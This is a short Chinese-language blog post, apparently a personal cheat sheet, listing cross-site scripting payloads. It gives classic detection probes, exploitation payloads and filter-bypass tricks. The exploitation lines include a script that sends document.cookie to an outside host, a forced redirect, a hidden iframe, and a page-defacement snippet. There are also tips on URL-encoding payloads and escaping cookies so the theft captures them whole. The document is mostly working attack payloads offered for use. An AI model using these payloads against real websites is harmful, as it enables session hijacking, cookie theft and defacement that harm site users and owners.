xss个人经验总结
2018-06-07 本文已影响49人
shadowflow
1,利用xss跳转网页 alert(window.location.href='http://www.sjtu.edu.cn')
2,弹出cookie alert(document.cookie)
2,可以试着对xss poc代码进行url编码再利用
3,闭合相应的标签;可以试着用“+”替代空格
4,cookie中有&等字符会分割cookie以至于打不到完整cookie这时可以用 escape(document.cookie)
经典POC
检测:
<script>alert('xss')</script>
<a href='' onclick=alert('xss')>type</a>
<img src=http://192.168.1.1/a.jpg onerror=alert('xss')>
利用:
<script>window.location='http://1.1.1.1'</script>
<iframe SRC="http://1.1.1.1/victim" height="0" width="0"></iframe>
<script>new Image().src="http://192.168.1.102/c.php?output="+document.cookie;</script>
<script>document.body.innerHTML=''<div style=visibility:visible;><h1>THIS WEBSITE IS UNDER ATTACK</h1></div>";</script>
绕过方法:
1. 过滤了script标签 :
payload:<input/onclick=alert(111)>
2. hidden下隐藏表单触发事件弹窗
<input type=hidden value==11 accesskey="h" onclick=alert(111)>
firefox下按 shift+alt+h 触发
3. script隐藏绕过弹窗
<script src="data:,alert(111)"></SCRIPT>
4. 小括号过滤绕过弹窗
<img src=111111 onerror=alert(2)>
5. 闭合url跳转,绕过alert检测
www.baidu.com";prompt(111);//